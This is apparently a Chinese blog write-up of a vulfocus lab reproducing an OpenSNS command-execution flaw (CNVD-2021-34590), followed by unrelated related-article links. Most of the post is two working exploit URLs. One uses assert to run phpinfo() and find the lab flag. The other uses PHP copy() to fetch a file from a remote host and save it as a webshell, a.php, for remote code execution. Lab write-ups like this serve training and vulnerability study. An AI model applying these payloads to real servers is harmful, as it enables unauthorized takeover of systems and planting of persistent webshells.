-
vulfocus——opensns命令执行(CNVD-2021-34590)
描述
OpenSNS存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。
复现
1.打开靶场
2.发送特定请求包可以执行任意命令
/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo()
3.在phpinfo找到flag
4.也可以通过下载webshell,用工具连接此处的cmd= 只能传参1个,在使用'system'函数空格会导致执行失败,故而使用php中的copy函数直接下载webshell实现RCE。
/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=copy(%27http://xxx/a.txt%27,%27a.php%27)copy(远程文件下载地址,需要下载到的地方) -
相关阅读:
dubbo 自定义异常
golang 控制并发有两种经典方式:WaitGroup 和 Context
主流开发语言和开发环境介绍
防火墙详解
创作纪念日-我的第1024天
宽占满整张纸
基于Tensorflow的图像特效合成算法研究
【DataOps】- 数据开发治理一体化之网易数帆数据治理2.0实践分享
Vue3.0第一天
【配送路径规划】基于matlab遗传算法求解带时间窗的含充电站配送车辆路径规划问题【含Matlab源码 509期】
- 原文地址:https://blog.csdn.net/m0_62063669/article/details/127111301